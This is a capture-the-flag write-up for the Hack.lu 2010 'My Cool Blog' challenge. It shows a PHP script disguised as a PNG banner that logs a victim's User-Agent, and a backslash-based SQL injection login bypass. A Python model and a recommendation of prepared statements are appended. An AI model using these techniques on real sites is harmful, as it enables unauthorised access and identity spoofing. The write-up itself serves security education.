Hack.lu 2010 CTF #13 (My Cool Blog) writeup

Captain Rumbarrel is shocked because he found out that the filthy pirate Boozybold has stolen a whole shipment of rum! So Rumbarrel wants his revenge by hacking Boozybold's cool blog. Unfortunately he can not hack, so help him and get 250 gold coins!

From the main page of his cool blog, we get three main points:

  • He has a browser check for his admin page. How can he check the browser? Obviously via the User-Agent header
  • He has a banner rotation script that shows a random image on the main page
  • He has a script that auto-refreshes the main page in his browser every 3 minutes

To get into the admin page, we need to steal Boozybold’s browser identity. Thanks to the banner rotation script, we can trick him into visiting our image. Let’s code a script that will log the User-Agent of whoever requests it:

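<?php
// Append the requester's IP and User-Agent to a log file.
$fo = fopen("log.log", "a");
fwrite($fo, "[" . date("j M Y G:i:s") . "] IP: " .
  $_SERVER['REMOTE_ADDR'] . ", uag: " . ($_SERVER['HTTP_USER_AGENT'] ?? '') . "\n");
fclose($fo);
// Answer with a real PNG so the banner rotation script accepts the response.
header("Content-Type: image/png");
readfile("empty.png");
?>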

(The banner rotation script requires our URL to end with .png and the returned data to be a PNG.)

Then I spammed the banner script a bit with my URL (http://…/script.php/q.png) to raise my chances :)
And in a few minutes a cool line in the log appeared:

[27 Oct 2010 22:53:00] IP: 91.214.168.57, uag: CoolBlogBrowserToVisitACP

After sending this User-Agent (for example, from Firefox), an admin login form appears.

If you experiment for a while, you find that the symbols ‘=’, ‘-’, ‘+’, space and ‘_’ are banned (the page shows “You try to hack me?”), and \ gives a MySQL error:

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near
''\' AND password=''' at line 1

(dunno why a quote doesn’t cause an error, maybe it is escaped and \ is not)

If we use \ as the login and or(1)# as the password, the query turns into something like:

SELECT 1 FROM admins WHERE username = '\' AND password = 'or(1)#'

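The backslash escapes the quote that should close the username, so the string literal runs up to the quote that opens the password value; or(1) is then parsed as SQL, and # comments out the trailing quote. We get into the admin panel, where we are given the flag: Th1sW4snts0h4rdlittl3monk3y.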
+253 :)
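
Added example, not part of the original writeup or of the challenge's code: a constructed Python model of the login query showing why the character blacklist plus quote-only escaping (the guess made above) still lets the \ login change the query's structure, and that escaping the backslash as well keeps both inputs inside string literals. The function names and the filter logic are assumptions.

```python
# Added example: a constructed model of the login query, not the blog's code.
BANNED = set("=-+ _")  # characters the writeup reports as rejected

def passes_blacklist(value):
    return not (set(value) & BANNED)

def escape_quotes_only(value):
    # Assumption (the writeup's guess): quotes are escaped, backslashes are not.
    return value.replace("'", "\\'")

def escape_backslash_too(value):
    # Backslash must be escaped first, then the quote.
    return value.replace("\\", "\\\\").replace("'", "\\'")

def build_query(login, password, escape):
    return ("SELECT 1 FROM admins WHERE username = '" + escape(login)
            + "' AND password = '" + escape(password) + "'")

def code_segments(sql):
    """Scan sql with MySQL's default string rules and return
    (non-empty text outside '...' literals and before '#', unterminated)."""
    segments, buf, in_str, i = [], "", False, 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\":
                i += 1              # backslash swallows the next character
            elif c == "'":
                in_str = False
        elif c == "'":
            in_str = True
            segments.append(buf)
            buf = ""
        elif c == "#":
            break                   # rest of the line is a comment
        else:
            buf += c
        i += 1
    segments.append(buf)
    return [s for s in segments if s], in_str

def structure_preserved(login, password, escape):
    # Input is safe only if the code outside literals matches a benign query.
    baseline = code_segments(build_query("a", "b", escape))
    return code_segments(build_query(login, password, escape)) == baseline

if __name__ == "__main__":
    for esc in (escape_quotes_only, escape_backslash_too):
        print(esc.__name__, structure_preserved("\\", "or(1)#", esc))
```

Prepared statements with bound parameters avoid the escaping question altogether and are the fix to prefer in real code.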
